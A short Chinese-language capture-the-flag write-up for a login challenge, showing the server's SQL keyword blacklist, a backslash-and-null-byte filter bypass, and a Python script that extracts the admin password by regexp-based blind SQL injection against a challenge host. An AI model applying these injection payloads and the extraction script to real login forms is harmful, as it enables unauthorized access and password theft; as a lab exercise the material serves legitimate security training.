robotx.txt 下放了个提示 hint.txt
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,
Then you will get the flag;
过滤挺多的,然后需要最后提交的 passwd 正确就可以得到flag
username=\&passwd=||/**/1;%00
就变成这种形式,%00也可以当做注释
select * from users where username='\' and passwd='||/**/1;
import requests
url = 'http://b900e3e6-85e9-48e0-b95a-253bbbd9b761.node4.buuoj.cn:81/index.php'
strs = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}+-"
result = ""
while True:
for i in strs:
payload = "||(passwd/**/regexp/**/{});\x00".format('"^'+result+i+'"')
data = {
'username': '\\',
'passwd': payload
}
res = requests.post(url=url,data=data).text
if "welcome" in res:
result += i
print(result)
break